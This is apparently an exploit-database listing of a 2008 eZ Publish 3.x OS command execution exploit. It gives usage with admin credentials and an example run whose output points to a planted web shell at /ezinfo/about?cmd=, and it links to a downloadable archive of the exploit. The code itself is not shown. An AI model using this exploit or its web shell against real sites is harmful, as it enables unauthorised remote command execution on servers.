26 lines
No EOL
840 B
Text
26 lines
No EOL
840 B
Text
/*
|
|
eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru]
|
|
Versions affected 3.x
|
|
|
|
* tested on version 3.9.0, 3.9.5, 3.10.1
|
|
|
|
usage:
|
|
|
|
# ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
|
|
|
|
The options are required:
|
|
|
|
-u Login of the exists admin on eZ Publish
|
|
-p Admin password on eZ Publish
|
|
-s Target eZ Publish admin interface
|
|
|
|
example:
|
|
|
|
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
|
|
[+] Exploit successfully sending
|
|
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
|
|
*/
|
|
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip)
|
|
|
|
# milw0rm.com [2008-12-11] |